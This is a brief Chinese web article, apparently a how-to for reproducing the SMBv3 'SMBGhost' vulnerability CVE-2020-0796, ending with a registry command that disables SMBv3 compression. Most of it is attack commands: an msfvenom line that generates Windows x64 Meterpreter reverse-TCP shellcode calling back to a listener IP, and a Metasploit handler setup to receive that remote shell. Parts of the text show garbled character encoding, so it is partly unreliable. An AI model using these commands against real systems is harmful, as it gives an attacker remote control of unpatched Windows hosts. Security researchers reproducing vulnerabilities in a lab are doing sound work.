您好,登錄后才能下訂單哦!
本篇文章為大家展示了CVE-2020-0796 SMBv3漏洞復現(xiàn)過程是怎樣的,內容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細介紹希望你能有所收獲。
掃描py文件鏈接
poc地址
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.236.130 lport=4444 -f py -o exp.py
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lport 4444 set lhost 192.168.236.130 run
如果報錯根據(jù)錯誤修改exploit.py的參數(shù)。
修復建議:
禁用SMBv 3壓縮,具體命令如下
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force
上述內容就是CVE-2020-0796 SMBv3漏洞復現(xiàn)過程是怎樣的,你們學到知識或技能了嗎?如果還想學到更多技能或者豐富自己的知識儲備,歡迎關注億速云行業(yè)資訊頻道。
免責聲明:本站發(fā)布的內容(圖片、視頻和文字)以原創(chuàng)、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關證據(jù),一經查實,將立刻刪除涉嫌侵權內容。